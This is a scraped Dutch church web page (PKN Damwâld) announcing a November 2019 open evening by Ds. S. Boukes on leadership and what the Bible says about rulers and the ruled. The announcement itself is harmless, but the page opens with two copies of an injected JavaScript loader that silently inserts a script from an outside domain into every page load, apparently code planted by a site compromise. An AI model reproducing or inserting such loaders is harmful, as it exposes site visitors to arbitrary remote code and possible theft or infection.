;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Open avond '' Hete hangijzers" - PKN Damwâld

Open avond ” Hete hangijzers”

Gepubliceerd op: donderdag 14 november 2019

In de vorige Paadwizer heb ik al aangekondigd dat ik een paar avonden wil organiseren rond zaken die in onze tijd actueel en in het nieuws zijn. Daarom kon ik toen mijn keuze nog niet maken, want niets gaat sneller dan de ontwikkelingen in de wereld van vandaag. Tal van zaken houden ons bezig, en in de veelheid van de vragen raak je het spoor makkelijk kwijt. Daarom deze avonden: ze willen helpen met elkaar houvast te vinden in onze woelige tijd. Aan keuzemogelijkheden had ik voor de eerste avond die ik gepland heb voor dinsdag 19 november om 20 uur in De Ontmoeting dus geen gebrek. Er zijn zoveel protestacties die knelpunten voor het voetlicht brengen, wereldwijd en in ons land.

Maar voor deze avond wil ik het gaan hebben over: Wat zijn goede leiders, en hoe gaan wij met leiders om? Want je zult maar moeten regeren in onze tijd, van alle kanten belaagd door groepen die voor hun belang strijden. Omgaan met macht is in onze tijd een hachelijke zaak, want de machthebber van vandaag is de loser van morgen. Maar er zit ook een andere kant aan: men zegt weleens: een volk krijgt de leiders die het verdient. Daarom is er niet alleen de kant van de leiders, maar ook die van ons, die door hen geleid worden. Wat kunnen wij doen om onze leiders te helpen om hun verantwoordelijkheid op een goede manier te dragen?

Volgens mij heeft de Bijbel inspirerende dingen te zeggen voor hen die regeren en voor hen die geregeerd worden. En het lijkt me een uitdaging om die te leggen naast onze tijd.

Als u er meer over wil horen en erover wil meedenken, bent u van harte welkom op 19 november.

Ds. S. Boukes